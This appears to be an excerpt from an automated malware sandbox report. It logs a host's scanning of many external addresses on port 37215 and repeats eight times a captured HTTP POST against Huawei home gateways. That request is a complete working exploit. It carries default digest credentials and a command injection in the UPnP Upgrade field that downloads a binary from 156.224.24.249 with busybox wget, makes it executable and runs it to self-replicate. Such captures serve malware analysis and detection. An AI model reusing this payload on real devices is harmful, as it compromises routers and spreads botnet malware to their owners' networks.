          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.15.206.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 90.15.221.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.11.232.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.86.219.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 149.110.23.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.162.69.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.24.30.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.62.79.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 52.231.172.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.88.25.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.82.81.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.176.221.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 94.190.170.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 125.142.32.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 189.77.200.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.111.172.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.212.34.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 50.103.245.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 13.57.175.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.182.71.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.222.38.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.70.116.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.212.130.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.243.87.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.122.188.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.174.128.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.58.75.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.249.35.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.68.118.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.109.25.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.0.111.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.243.13.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.35.64.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 155.172.149.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.46.201.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.246.132.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.60.155.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.199.157.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.177.82.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.56.159.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.141.127.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.254.81.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.81.138.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.165.78.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.165.13.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.136.209.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.99.184.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.77.126.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.162.199.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.133.243.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.123.105.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.148.243.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.11.248.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.236.220.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.114.3.57:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
